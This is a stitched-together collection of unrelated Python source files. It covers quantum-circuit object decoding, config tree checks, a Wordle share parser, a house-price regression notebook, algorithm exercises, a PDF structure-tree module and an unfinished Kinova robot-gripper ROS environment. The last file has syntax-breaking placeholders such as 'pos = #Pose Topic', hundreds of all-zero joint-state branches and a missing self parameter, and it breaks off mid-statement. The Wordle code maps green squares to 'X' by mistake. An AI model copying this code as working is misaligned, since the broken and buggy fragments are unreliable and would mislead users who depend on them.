dict_to_qobj(qobj_dict: Dict) -> Union[QasmQobj, PulseQobj]: """Convert a Qobj in dictionary format to an instance. Args: qobj_dict: Qobj in dictionary format. Returns: The corresponding QasmQobj or PulseQobj instance. """ if qobj_dict['type'] == 'PULSE': _decode_pulse_qobj(qobj_dict) # Convert to proper types. return PulseQobj.from_dict(qobj_dict) return QasmQobj.from_dict(qobj_dict) def _decode_pulse_qobj(pulse_qobj: Dict) -> None: """Decode a pulse Qobj. Args: pulse_qobj: Qobj to be decoded. """ pulse_library = pulse_qobj['config']['pulse_library'] for lib in pulse_library: lib['samples'] = [_to_complex(sample) for sample in lib['samples']] for exp in pulse_qobj['experiments']: for instr in exp['instructions']: if 'val' in instr: instr['val'] = _to_complex(instr['val']) if 'parameters' in instr and 'amp' in instr['parameters']: instr['parameters']['amp'] = _to_complex(instr['parameters']['amp']) def _to_complex(value: Union[List[float], complex]) -> complex: """Convert the input value to type ``complex``. Args: value: Value to be converted. Returns: Input value in ``complex``. Raises: TypeError: If the input value is not in the expected format. """ if isinstance(value, list) and len(value) == 2: return complex(value[0], value[1]) elif isinstance(value, complex): return value raise TypeError("{} is not in a valid complex number format.".format(value))
StarcoderdataPython
1700097
# Copyright (c) 2012 <NAME>, Hupfeldt IT # All rights reserved. This work is under a BSD license, see LICENSE.TXT. from multiconf.repeatable import Repeatable from multiconf import ConfigItem, ConfigBuilder def check_containment(start_item, level=0, prefix=" "): for key, item in start_item.iteritems(): if isinstance(item, Repeatable): for _rkey, ritem in item.iteritems(): check_containment(ritem, level+1, "R ") if isinstance(item, ConfigItem) and not isinstance(item, ConfigBuilder): assert id(item.contained_in) == id(start_item), \ "item.contained_in: " + repr(id(item.contained_in)) + ('name=' + item.contained_in.name if hasattr(item.contained_in, 'name') else '') + \ repr(type(item.contained_in)) + \ ", start_item: " + repr(id(start_item)) + ('name=' + start_item.name if hasattr(start_item, 'name') else '') + \ repr(type(start_item)) check_containment(item, level+1)
StarcoderdataPython
99900
#stupid hacky stuff logging = 0 exec(open("./wordle-evaluator.py").read()) hardMode = False def load_freq(): with open('unigram_freq.csv') as f: freq = {} f.readline() for line in f: freq[line.split(',')[0].strip().upper()] = int(line.split(',')[1]) return freq def add_freq(): with open('unigram_freq.csv') as f: freq = {} f.readline() for line in f: freq[line.split(',')[0].strip().upper()] = int(line.split(',')[1]) file = open('wordle-guesses.txt', 'r') wfile = open('wordle-g-freq.csv', 'w') for l in file: if l.strip() in freq.keys(): wfile.write(l.strip() + "," + str(freq[l.strip()]) + '\n') else: wfile.write(l.strip() + ",0\n") def transform(s): s = s.replace(":black_large_square:", "X") s = s.replace(":white_large_square:", "X") s = s.replace(":large_green_square:", "G") s = s.replace(":large_yellow_square:", "Y") s = s.replace("⬛", "X") s = s.replace("⬜", "X") s = s.replace("🟨", "Y") s = s.replace("🟩", "X") return s def loadGuesses(answer): logging.info("Loading answer tables") freq = load_freq() results = {} last_pos = 0; with open("gamut.csv", "r") as g: for l in g: ls = l.split(",") gAnswer = ls[0] if gAnswer == answer: gGuess = ls[1] gResult = ls[2] t = results.setdefault(gResult, []) t.append((gGuess,freq.setdefault(gGuess, 0))) return (results) def loadSequence(filename, answer): gamut = loadGuesses(answer) with open(filename) as f: l = f.readline() if not l.startswith("Wordle"): logging.info("This is not a Wordle share file.") quit() if l.count('X/6') > 0: logging.info("Cannot process non-winning sequences.") quit() if l.count('*') > 0: hardMode = True for a in f: h = transform(a).strip().upper() print(gamut[h]) loadSequence("share.txt","QUERY")
StarcoderdataPython
3285913
import json from . import geo, date, data, calc geo = geo date = date data = data calc = calc # Outputs JSON for the given dictionary or list to the given path. def save_json(x, path, quiet=False): # pragma: no cover with open(path, 'w+') as output_file: output_file.write(json.dumps(x, separators=(',', ':'))) if not quiet: print(f'Saved {path}') # Returns only the unique elements in a list def unique(l): unique_list = [] for item in l: if item not in unique_list: unique_list.append(item) return unique_list
StarcoderdataPython
64048
<gh_stars>0 # -*- coding: utf-8 -*- """Demo236_House_Preprocessed.ipynb Automatically generated by Colaboratory. Original file is located at https://colab.research.google.com/drive/1D-6jwkEPkq3S7AiHnSH2SYp6FJPGArlF """ import numpy as np import matplotlib.pyplot as plt import pandas as pd import seaborn as sns from itertools import product """## Get Dataset""" def get_regression(X, y, regressors,texts): f, axarr = plt.subplots(2,2, sharex='col', sharey='row', figsize=(10, 8)) for idx, clf, tt in zip(product([0, 1], [0, 1]), regressors, texts): y_pred = clf.predict(np.sort(X_test.reshape(-1)).reshape(-1,1)) axarr[idx[0], idx[1]].plot(np.sort(X_test.reshape(-1)).reshape(-1,1), y_pred) axarr[idx[0], idx[1]].scatter(X, y, c=y, s=20, edgecolor='k') axarr[idx[0], idx[1]].set_title(tt) plt.show() def report_regression( X, y,regressors,texts): from sklearn.metrics import mean_squared_error as mse results = {} for clf, tt in zip( regressors, texts): y_pred = clf.predict(X) results[tt] = mse(y, y_pred) return results from google.colab import drive drive.mount("/content/gdrive") data = pd.read_csv('/content/gdrive/My Drive/Colab Notebooks/FeatureSelection/train_house.csv') data.keys() y = data.SalePrice X = data.drop(columns=['SalePrice']) X.dtypes X['SaleCondition'].dtype objs = [] nums = [] for i in X.columns: if X[i].dtype == 'O': objs.append(i) else: nums.append(i) na_objs = [] na_nums = [] for i in X.columns: if (X[i].isnull().sum() > 0): print(i, " ", X[i].isnull().sum()) if X[i].dtype == 'O': na_objs.append(i) else: na_nums.append(i) na_nums na_objs def impute(df, columns, dft): df_temp = df.copy() for column in columns: df_temp[column] = df_temp[column].apply(lambda x: np.random.choice(dft[column].dropna().values) if pd.isnull(x) else x) return df_temp X = impute(X,na_nums + na_objs , X) X.isnull().sum() X.head() for col in objs: mapper = {k:i for i, k in enumerate(X[col].unique(), 0)} X[col] = X[col].map(mapper) X.head() objs_oh = [] for col in objs: if len(X[col].unique())>2: objs_oh.append(col) objs_oh len(X.columns) for i in objs_oh: X = pd.concat([X, pd.get_dummies(X[i], prefix = i, drop_first=True)], axis=1) X = X.drop(columns=objs_oh) len(X.columns) # from sklearn.decomposition import PCA # obj = PCA() # X = obj.fit_transform(X) # TRAIN TEST SPLIT from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3) # Feature Scaling from sklearn.preprocessing import StandardScaler sc = StandardScaler() X_train = sc.fit_transform(X_train) X_test = sc.transform(X_test) from sklearn.tree import DecisionTreeRegressor from sklearn.neighbors import KNeighborsRegressor from sklearn.svm import SVR from sklearn.ensemble import RandomForestRegressor regressors = [ DecisionTreeRegressor().fit(X_train, y_train), KNeighborsRegressor().fit(X_train, y_train), SVR(gamma=.1, kernel='rbf').fit(X_train, y_train), RandomForestRegressor().fit(X_train, y_train) ] texts = [ "DecisionTreeRegressor", "KNeighborsRegressor", "SVR", "RandomForestRegressor"] # get_regression(X_test, y_test, regressors, texts) report = report_regression( X_test, y_test,regressors,texts) report keys = list(report.keys()) vals = [float(report[k]) for k in keys] sns.barplot(x=keys, y=vals)
StarcoderdataPython
1681404
class Solution: def countVowelStrings(self, n: int) -> int: dp = [[i for i in range(5,0,-1)] for _ in range(n)] for i in range(1,n): for j in range(3,-1,-1): dp[i][j] = dp[i - 1][j] + dp[i][j + 1] return dp[n-1][0]
StarcoderdataPython
1629092
import sys import argparse import pandas as pd import numpy as np parser = argparse.ArgumentParser(description='Create dummy reference data.') parser.add_argument('--items', help='Input cscv with items. default: %(default)s', metavar='<name>', default='items.csv') parser.add_argument('--case_ids', help='Input txt with case ids. default: %(default)s', metavar='<name>', default='case_ids.txt') parser.add_argument('--reference', help='Output reference csv. default: %(default)s', metavar='<name>', default='reference.csv') args = parser.parse_args() df_items = pd.read_csv(args.items, dtype=str, keep_default_na=False, na_values=[], encoding='cp932') with open(args.case_ids) as f: case_ids = f.read().splitlines() data = np.random.randint(0, 100, (len(case_ids), len(df_items))) df_ref = pd.DataFrame(data, columns=df_items['id'], index=case_ids) df_ref.index.name = 'id' df_ref.to_csv(args.reference, encoding='cp932')
StarcoderdataPython
109565
import math def buildSparseTable(arr, n): for i in range(0, n): lookup[i][0] = arr[i] j = 1 while (1 << j) <= n: i = 0 while (i + (1 << j) - 1) < n: if (lookup[i][j - 1] < lookup[i + (1 << (j - 1))][j - 1]): lookup[i][j] = lookup[i][j - 1] else: lookup[i][j] = lookup[i + (1 << (j - 1))][j - 1] i += 1 j += 1 def query(L, R): j = int(math.log2(R - L + 1)) if lookup[L][j] <= lookup[R - (1 << j) + 1][j]: return lookup[L][j] else: return lookup[R - (1 << j) + 1][j] if __name__ == "__main__": a = [7, 2, 3, 0, 5, 10, 3, 12, 18] n = len(a) MAX = 500 lookup = [[0 for i in range(MAX)] for j in range(MAX)] buildSparseTable(a, n) print(query(0, 4)) print(query(4, 7)) print(query(7, 8))
StarcoderdataPython
74694
""" Project Euler Problem 174: https://projecteuler.net/problem=174 We shall define a square lamina to be a square outline with a square "hole" so that the shape possesses vertical and horizontal symmetry. Given eight tiles it is possible to form a lamina in only one way: 3x3 square with a 1x1 hole in the middle. However, using thirty-two tiles it is possible to form two distinct laminae. If t represents the number of tiles used, we shall say that t = 8 is type L(1) and t = 32 is type L(2). Let N(n) be the number of t ≤ 1000000 such that t is type L(n); for example, N(15) = 832. What is ∑ N(n) for 1 ≤ n ≤ 10? """ from collections import defaultdict from math import ceil, sqrt def solution(t_limit: int = 1000000, n_limit: int = 10) -> int: """ Return the sum of N(n) for 1 <= n <= n_limit. >>> solution(1000,5) 249 >>> solution(10000,10) 2383 """ count: defaultdict = defaultdict(int) for outer_width in range(3, (t_limit // 4) + 2): if outer_width * outer_width > t_limit: hole_width_lower_bound = max( ceil(sqrt(outer_width * outer_width - t_limit)), 1 ) else: hole_width_lower_bound = 1 hole_width_lower_bound += (outer_width - hole_width_lower_bound) % 2 for hole_width in range(hole_width_lower_bound, outer_width - 1, 2): count[outer_width * outer_width - hole_width * hole_width] += 1 return sum(1 for n in count.values() if 1 <= n <= 10) if __name__ == "__main__": print(f"{solution() = }")
StarcoderdataPython
3336475
<gh_stars>0 import click @click.command() @click.option('--name', default="world", help="Name to use when printing 'hello'") def main(name): click.echo("Hello %s" % name) if __name__ == "__main__": main()
StarcoderdataPython
13544
# created by <NAME> # 7/8/16 import classes as c def printIntro(): print 'Welcome to the\n' print '''__/\\\\\\\\\\\\\\\\\\\\\\\\_________________________________________________\ __________________________\n _\\/\\\\\\////////\\\\\\___________________________________\ ______________________________________\n _\\/\\\\\\______\\//\\\\\\___________________\ ___________________________________________/\\\\\\______\n _\\/\\\\\\_______\\/\\\\\ \\_____/\\\\\\\\\\\\\\\\___/\\\\\\\\\\\\\\\\\\\\_____/\\\\\\\\\\\\\\\\___/\\\\/\\\\\\\\\\\ \\\\___/\\\\\\\\\\\\\\\\\\\\\\_\n _\\/\\\\\\_______\\/\\\\\\___/\\\\\\/////\\\\\\_\ \\/\\\\\\//////____/\\\\\\/////\\\\\\_\\/\\\\\\/////\\\\\\_\\////\\\\\\////__\n \ _\\/\\\\\\_______\\/\\\\\\__/\\\\\\\\\\\\\\\\\\\\\\__\\/\\\\\\\\\\\\\\\\\\\\__/\\\\\\\\\\\ \\\\\\\\\\\\__\\/\\\\\\___\\///_____\\/\\\\\\______\n _\\/\\\\\\_______/\\\\\\\ __\\//\\\\///////___\\////////\\\\\\_\\//\\\\///////___\\/\\\\\\____________\\/\\\\\\_/\\\ \\__\n _\\/\\\\\\\\\\\\\\\\\\\\\\\\/____\\//\\\\\\\\\\\\\\\\\\\\__/\\\\\\\\\ \\\\\\\\\\\\__\\//\\\\\\\\\\\\\\\\\\\\_\\/\\\\\\____________\\//\\\\\\\\\\___\n \ _\\////////////_______\\//////////__\\//////////____\\//////////__\\///____________\ __\\//\///____''' print print 'created by <NAME>\n' def getUname(): done = False while not done: uname = raw_input("Enter your name: ") if set(uname) <= set('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'): if len(uname) <= 40: done = True else: print 'Please keep your name to 40 letters or less' else: print 'Please use only letters in your name' return uname def createPlayer(name): #c.Person(mainp [main character or not], name, weight, health, xp) return c.Person(True, name, 150, 10, 100, 0) def printIntro1(player): msg = """================================================== Welcome to the desert, %s. "To survival." *clink* """ print msg % player.getName()
StarcoderdataPython
3277816
<reponame>LourencoFernando/SMS-Project """ Quoting the PDF spec: > PDF’s logical _structure facilities_ provide a mechanism for incorporating > structural information about a document’s content into a PDF file. > The logical structure of a document is described by a hierarchy of objects called > the _structure hierarchy_ or _structure tree_. > At the root of the hierarchy is a dictionary object called the _structure tree root_, > located by means of the **StructTreeRoot** entry in the document catalog. """ from collections import defaultdict from typing import NamedTuple, List, Optional, Union from .syntax import PDFObject, PDFString, PDFArray # pylint: disable=inherit-non-class,unsubscriptable-object class MarkedContent(NamedTuple): page_object_id: int # refers to the first page displaying this marked content struct_parents_id: int struct_type: str mcid: Optional[int] = None title: Optional[str] = None alt_text: Optional[str] = None class NumberTree(PDFObject): """A number tree is similar to a name tree, except that its keys are integers instead of strings and are sorted in ascending numerical order. A name tree serves a similar purpose to a dictionary—associating keys and values—but by different means. The values associated with the keys may be objects of any type. Stream objects are required to be specified by indirect object references. It is recommended, though not required, that dictionary, array, and string objects be specified by indirect object references, and other PDF objects (nulls, numbers, booleans, and names) be specified as direct objects """ __slots__ = ("_id", "nums") def __init__(self, **kwargs): super().__init__(**kwargs) self.nums = defaultdict(list) # {struct_parent_id -> struct_elems} def serialize(self, fpdf=None, obj_dict=None): newline = "\n" serialized_nums = "\n".join( f"{struct_parent_id} [{newline.join(struct_elem.ref for struct_elem in struct_elems)}]" for struct_parent_id, struct_elems in self.nums.items() ) return super().serialize(fpdf, {"/Nums": f"[{serialized_nums}]"}) class StructTreeRoot(PDFObject): __slots__ = ("_id", "type", "parent_tree", "k") def __init__(self, **kwargs): super().__init__(**kwargs) self.type = "/StructTreeRoot" # A number tree used in finding the structure elements to which content items belong: self.parent_tree = NumberTree() # The immediate child or children of the structure tree root in the structure hierarchy: self.k = PDFArray() class StructElem(PDFObject): # The main reason to use __slots__ in PDFObject child classes is to save up some memory # when very many instances of this class are created. __slots__ = ("_id", "type", "s", "p", "k", "pg", "t", "alt") def __init__( self, struct_type: str, parent: PDFObject, kids: Union[List[int], List["StructElem"]], page: PDFObject = None, title: str = None, alt: str = None, **kwargs, ): super().__init__(**kwargs) self.type = "/StructElem" self.s = ( struct_type # a name object identifying the nature of the structure element ) self.p = parent # The structure element that is the immediate parent of this one in the structure hierarchy self.k = PDFArray(kids) # The children of this structure element self.pg = page # A page object on which some or all of the content items designated by the K entry are rendered self.t = ( None if title is None else PDFString(title) ) # a text string representing it in human-readable form self.alt = ( None if alt is None else PDFString(alt) ) # An alternate description of the structure element in human-readable form class StructureTreeBuilder: def __init__(self): """ Args: marked_contents (tuple): list of MarkedContent """ self.struct_tree_root = StructTreeRoot() self.doc_struct_elem = StructElem( struct_type="/Document", parent=self.struct_tree_root, kids=[] ) self.struct_tree_root.k.append(self.doc_struct_elem) self.struct_elem_per_mc = {} def add_marked_content(self, marked_content): page = PDFObject(marked_content.page_object_id) struct_elem = StructElem( struct_type=marked_content.struct_type, parent=self.doc_struct_elem, kids=[] if marked_content.mcid is None else [marked_content.mcid], page=page, title=marked_content.title, alt=marked_content.alt_text, ) self.struct_elem_per_mc[marked_content] = struct_elem self.doc_struct_elem.k.append(struct_elem) self.struct_tree_root.parent_tree.nums[marked_content.struct_parents_id].append( struct_elem ) def next_mcid_for_page(self, page_object_id): return sum( 1 for mc in self.struct_elem_per_mc if mc.page_object_id == page_object_id ) def empty(self): return not self.struct_elem_per_mc def serialize(self, first_object_id=1, fpdf=None): """ Assign object IDs & output the whole hierarchy tree serialized as a multi-lines string in PDF syntax, ready to be embedded. Objects ID assignement will start with the provided first ID, that will be assigned to the StructTreeRoot. Apart from that, assignement is made in an arbitrary order. All PDF objects must have assigned IDs before proceeding to output generation though, as they have many references to each others. If a FPDF instance provided, its `_newobj` & `_out` methods will be called and this method output will be meaningless. """ self.assign_ids(first_object_id) output = [] output.append(self.struct_tree_root.serialize(fpdf)) output.append(self.doc_struct_elem.serialize(fpdf)) output.append(self.struct_tree_root.parent_tree.serialize(fpdf)) for struct_elem in self.doc_struct_elem.k: output.append(struct_elem.serialize(fpdf)) return "\n".join(output) def assign_ids(self, n): self.struct_tree_root.id = n n += 1 self.doc_struct_elem.id = n n += 1 self.struct_tree_root.parent_tree.id = n n += 1 for struct_elem in self.doc_struct_elem.k: struct_elem.id = n n += 1 return n
StarcoderdataPython
3217197
#!/usr/bin/env python3 ############### # Author: Paresh # Purpose: Simulation to Real Implementation on Kinova # Summer 2020 ############### import numpy as np import math import matplotlib.pyplot as plt import time import os, sys from scipy.spatial.transform import Rotation as R import random import pickle import pdb import torch import torch.nn as nn import torch.nn.functional as F import xml.etree.ElementTree as ET from classifier_network import LinearNetwork, ReducedLinearNetwork import re from scipy.stats import triang import rospy from sensor_msgs.msg import JointState from kinova_msgs.msg import FingerPosition, KinovaPose from kinova_path_planning import MoveRobot from geometry_msgs.msg import PoseStamped device = torch.device("cuda" if torch.cuda.is_available() else "cpu") class KinovaGripper_Env: def init(): self.kinova_rob = MoveRobot() self.joint_states = JointState() self.finger_pos = FingerPosition() self.reward = 0 self.object_pose = KinovaPose() self.Grasp_Reward = False self.wrist_pose=np.zeros(3) # The wrist position in world coordinates. Since we using local co-ordinate it is 0 ###Grasp Classifier### self.Grasp_net = LinearNetwork().to(device) trained_model = "path to model" model = torch.load(trained_model) self.Grasp_net.load_state_dict(model) self.Grasp_net.eval() ###Subscribers### self.joint_state_sub = rospy.Subscriber('/j2s7s300_driver/out/joint_state', JointState, joint_state_callback, queue_size=1) self.finger_sub = rospy.Subscriber('/j2s7s300_driver/out/finger_position', FingerPosition, finger_state_callback, queue_size=1) self.object_pose_sub = rospy.Subscriber('Object pose topic', KinovaPose, object_pose_callback, queue_size=1) ###Publisher### self.finger_command_pub = rospy.Publisher('/sim2real/finger_command', FingerPosition, queue_size=1) self.joint_angle_command_pub = rospy.Publisher('/sim2real/joint_angle_command', JointState, joint_angle_client, queue_size=1) ### Finger Position in Radians ### def get_joint_states(self): temp = list(self.joint_states.position) finger_joint_state_value = [0, 0, 0] finger_joint_state_value[0] = temp[7] finger_joint_state_value[1] = temp[8] finger_joint_state_value[2] = temp[9] return finger_joint_state_value def get_obj_pose(self): return self.object_pose # Function to return the angles between the palm normal and the object location def get_angles(self): obj_pose = self.get_obj_pose() #x, y, z #self._get_trans_mat_wrist_pose() local_obj_pos=np.copy(obj_pose) local_obj_pos=np.append(local_obj_pos,1) obj_wrist = local_obj_pos[0:3]/np.linalg.norm(local_obj_pos[0:3]) center_line = np.array([0,1,0]) z_dot = np.dot(obj_wrist[0:2],center_line[0:2]) z_angle = np.arccos(z_dot/np.linalg.norm(obj_wrist[0:2])) x_dot = np.dot(obj_wrist[1:3],center_line[1:3]) x_angle = np.arccos(x_dot/np.linalg.norm(obj_wrist[1:3])) return x_angle,z_angle # Function to get rewards based only on the lift reward. This is primarily used to generate data for the grasp classifier def get_reward_DataCollection(self): obj_target = 0.2 obs = self.get_obs() lift = rospy.get_param('Goal') if lift: lift_reward = 1 done = True elif obs[5]>obj_target+0.05: lift_reward=0.0 done=True else: lift_reward = 0 done = False return lift_reward, {}, done # Function to get rewards for RL training def get_reward(self): # object height target obj_target = 0.2 # Grasp reward grasp_reward = 0.0 obs = self.get_obs() network_inputs=obs inputs = torch.FloatTensor(np.array(network_inputs)).to(device) #if np.max(np.array(obs[41:47])) < 0.035 or np.max(np.array(obs[35:41])) < 0.015: outputs = self.Grasp_net(inputs).cpu().data.numpy().flatten() if (outputs >=0.3) & (not self.Grasp_Reward): grasp_reward = 5.0 self.Grasp_Reward=True else: grasp_reward = 0.0 lift = rospy.get_param('Goal') if lift: lift_reward = 50.0 done = True else: lift_reward = 0.0 done = False finger_reward = -np.sum((np.array(obs[41:47])) + (np.array(obs[35:41]))) #Distance between finger and object reward = 0.2*finger_reward + lift_reward + grasp_reward return reward, {}, done # Function to get the dimensions of the object def get_obj_size(self): return rospy.get_param('Object_size') # Function to place the object at a random position near the hand with a probability density designed to create more difficult grasps #def randomize_initial_pose(self, collect_data, size, shape): #This will get fixed by Stephanie # return rand_x, rand_y # Function to get the distance between the digits on the fingers and the object center def get_finger_obj_dist(self): #TODO:Center of finger to Object center distance finger_joints = ["f1_prox","f1_prox_1", "f2_prox", "f2_prox_1", "f3_prox", "f3_prox_1", "f1_dist", "f1_dist_1", "f2_dist", "f2_dist_1", "f3_dist", "f3_dist_1"] obj = self.get_obj_pose() dists = [] for i in finger_joints: pos = #Pose Topic dist = np.absolute(pos[0:2] - obj[0:2]) temp = np.linalg.norm(dist) dists.append(temp) return dists # Function to return global or local transformation matrix def get_obs(self): #Finger Joint states, Object Distance, Angles obj_pose = self.get_obj_pose() obj_pose = np.copy(obj_pose) x_angle,z_angle = self.get_angles() joint_states = self.get_joint_states() obj_size = self.get_obj_size() finger_obj_dist = self.get_finger_obj_dist() finger_joints = ["f1_prox", "f2_prox", "f3_prox", "f1_dist", "f2_dist", "f3_dist"] fingers_6D_pose = [] for joint in finger_joints: trans = #x y z postiion for i in range(3): fingers_6D_pose.append(trans[i]) fingers_6D_pose = fingers_6D_pose + list(self.wrist_pose) + list(obj_pose) + joint_states + [obj_size[0], obj_size[1], obj_size[2]*2] + finger_obj_dist + [x_angle, z_angle] #+ range_data return fingers_6D_pose #Function to reset the simulator def reset(self): obj = rospy.get_param('Object') rand_pos = np.random.randint(0, 30) if obj == 1: if rand_pos == 1: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 2: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 3: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 4: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 5: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 6: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 7: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 8: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 9: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 10: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 11: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 12: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 13: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 14: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 15: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 16: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 17: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 18: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 19: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 20: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 21: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 22: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 23: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 24: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 25: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 26: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 27: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 28: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 29: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 30: Joint_state = [0, 0, 0, 0, 0, 0,0] elif obj == 2: if rand_pos == 1: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 2: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 3: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 4: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 5: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 6: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 7: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 8: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 9: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 10: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 11: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 12: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 13: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 14: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 15: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 16: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 17: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 18: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 19: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 20: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 21: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 22: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 23: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 24: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 25: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 26: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 27: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 28: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 29: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 30: Joint_state = [0, 0, 0, 0, 0, 0,0] elif obj == 3: if rand_pos == 1: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 2: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 3: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 4: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 5: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 6: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 7: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 8: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 9: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 10: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 11: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 12: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 13: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 14: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 15: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 16: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 17: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 18: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 19: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 20: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 21: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 22: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 23: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 24: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 25: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 26: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 27: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 28: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 29: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 30: Joint_state = [0, 0, 0, 0, 0, 0,0] elif obj == 4: if rand_pos == 1: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 2: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 3: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 4: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 5: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 6: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 7: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 8: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 9: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 10: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 11: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 12: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 13: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 14: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 15: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 16: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 17: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 18: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 19: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 20: Joint_state = [0, 0, 0, 0, 0, 0,0] elif rand_pos == 21: 